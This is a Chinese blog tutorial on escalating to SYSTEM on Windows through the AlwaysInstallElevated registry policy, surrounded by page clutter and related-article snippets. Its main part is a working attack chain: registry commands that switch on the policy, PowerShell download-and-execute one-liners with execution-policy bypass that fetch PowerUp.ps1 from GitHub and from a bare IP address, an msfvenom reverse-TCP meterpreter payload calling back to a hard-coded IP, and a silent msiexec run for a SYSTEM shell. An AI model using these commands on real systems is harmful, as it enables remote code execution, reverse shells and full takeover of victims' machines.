Windows操作系统提权之系统服务漏洞提权Always Install Elevated

最新推荐文章于 2024-07-08 16:37:01 发布
最新推荐文章于 2024-07-08 16:37:01 发布
阅读量675 收藏 30
点赞数 16
分类专栏: 内网渗透 文章标签: 内网 渗透测试 安全 网络 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80361487/article/details/139379246
版权
Always Install Elevated

1.形成原因

任意用户以NT AUTHORITY\SYSTEM权限安装 i。
AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非
特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以
system权限执行任意payload。
MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序

2.Always Install Elevated(判断是否激活Always Install Elevated)

在测试环境启用AlwaysInstallElevated,命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

通过powerup判断

powershell -ep bypass iex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

 

powershell -ep bypass iex(new-object
net.webclient).downloadstring('http://150.158.137.72:8000/PowerUp.ps1');Get-
RegistryAlwaysInstallElevated

通过注册表判断

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启

通过修改注册表激活:

reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

3.提权准备 

2 msf生成exe程序
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=9090 LHOST=119.45.175.218 -f exe
>1.exe
3. 使用exemsi将exe封装为msi。
配置样式为下图所示,其他默认即可

4.提权流程 

上传test.msi到目标机器上

运行msi程序,得到system权限的shell。
受害者机器上执行:msiexec /quiet /qn /i 1.msi
网安+硬件
关注
  • 16
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
操作系统升(八)之系统错误配置-注册表键AlwaysInstall
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-02 447
注册表键AlwaysInstallElevated是一个策略设置项。windows允许低限用户以System限运行安装文件。如果启用此策略设置项,那么任何限用户都能以NT AUTHORITY\SYSTEM限来安装恶意的MSI(Microsoft Windows Installer)文件。
系统漏洞利用与
panda.
06-21 1418
1、使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])交;2、通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])交;3、利用Kali渗透机生成反弹木马,将生成木马命令执行后示的第四行的首个单词作为FLAG(形式:[单词])交;4、对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前限的用户名作为FLAG(形式:[用户名])交;......
is-elevated:检查进程是否以升的特运行
05-26
升高 检查进程是否以升的特运行 通过检查该进程在Unix系统上是否,或者在Windows上用户 。 请记住, root和Administrator含义不同,因此此模块可能不适用于您的用例。 安装 $ npm install is-elevated 用法 const isElevated = require ( 'is-elevated' ) ; ( async ( ) => { console . log ( await isElevated ( ) ) ; //=> false } ) ( ) ; 有关的 阻止用户使用root限运行您的应用程序 执照 麻省理工学院:copyright:
AlwaysInstallElevated介绍
bring_coco的博客
01-28 1298
介绍:AlwaysInstallElevated是注册表的一个键值,当其值为1时候,普通用户可以system限安装MSI文件 一.判断AlwaysInstallElevated状态 1.通过PowerUp判断 可以使用PowerUP的Get-RegistryAlwaysInstallElevated模块来检查注册表项是否被设置,如果AlwaysInstallElevated注册表项被设置,意味着MSI文件是以SYSTEM限运行的,True表示已经设置 命令:PowerShell -nop -exec b
Linux内核漏洞(Dirty-pipe)复现_linux漏洞
ZL_1618的博客
09-02 148
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
系统权之Windows
f_carey的博客
11-04 1304
郑重声明: 本笔记编写目的只用于安全知识升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
Windows系统姿势
懂进攻知防守
08-11 4701
攻击者通过安全漏洞把获取到的受限制的低限用户突破限制,到高限的管理员用户,从而获得对整个系统得控制
使用Data Time Picker控件调整系统时间
07-01
在开发Windows应用程序时,我们经常需要用户输入特定的日期或时间信息。这时,Data Time Picker控件便成为一个不可或缺的工具。这个控件允许用户通过一个直观的日历界面选择日期和时间,极大地高了用户体验。本文...
Windows使用docker打开新窗口error解决办法
01-10
//./pipe/docker_engine: The system cannot find the file specified....configuration on Windows, the docker client must be run elevated to connect. This error may also indicate that the dock
Frequency:基本的防热系统
05-23
这是主要由Elevated和Gson在Dawson的帮助下以及frap的额外精神支持下开发和维护的开源防tic 这种防热剂的主要目的是为新手进入防热剂供一些学习基础。 不建议将该项目用于生产服务器的商业用途,因为它尚未经过...
gsudo:适用于Windows的Sudo-在运行时升而不会产生新的控制台主机窗口
02-06
gsudo-Windows的sudo gsudo是Windows的sudo等效项,具有与原始* nix sudo相似的用户体验。 它允许在当前控制台窗口或新控制台窗口中以升的限运行命令,或升当前外壳程序。 只需在sudo前添加gsudo (或sudo...
VC.NET获取文件启动方式的工具及源代码.rar
07-10
首先,我们需要了解在Windows操作系统中,文件的启动方式主要由快捷方式的属性、文件的关联设置以及用户限等因素决定。在VC.NET中,我们可以利用.NET Framework供的API和类来获取这些信息。 1. 使用`System....
利用AlwaysInstallElevated
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言利用过程1.判断是否激活alwaysinstallelevated1.1通过powerup判断1.2通过注册表的键值判断2.激活AlwaysInstallElevated3.4.防御方式5.参考文章 前言 AlwaysInstallElevated是注册表的一个键值,当其值为1的时候,普通用户即可以system限安装msi程序。 利用过程 1.判断是否激活alwaysinstallelevated 1.1通过powerup判断 下载powerup certutil.exe -u
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 305
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 120
物联网技术的应用为储能安全排查供了从源头预防到快速响应的全链条解决方案。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1132
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
SetForegroundWindow Win32-API not always works on Windows-7
05-23
`SetForegroundWindow` is a Win32 API that is used to bring a window to the foreground and give it focus. However, it may not always work on Windows 7 due to changes in the operating system's window management behavior. One possible reason is that Windows 7 introduced a feature called "Aero Peek" that allows users to preview the contents of a window by hovering over its taskbar icon. This can interfere with `SetForegroundWindow`, as the user may unintentionally activate Aero Peek instead of focusing on the desired window. Another reason is that applications running with elevated privileges (i.e. as administrator) cannot bring windows of non-elevated applications to the foreground. This is a security feature to prevent malicious applications from stealing focus and potentially executing unwanted actions on behalf of the user. To work around these issues, you can try using the `BringWindowToTop` function instead of `SetForegroundWindow`. This function brings a window to the top of the Z-order, but does not give it focus. You can then use `SetFocus` to give the window focus manually. Alternatively, you can try using the `AllowSetForegroundWindow` function to grant your application permission to bring other windows to the foreground. This is useful if your application needs to bring windows of other applications to the foreground. However, this function requires a special privilege and should be used with caution.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安+硬件

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值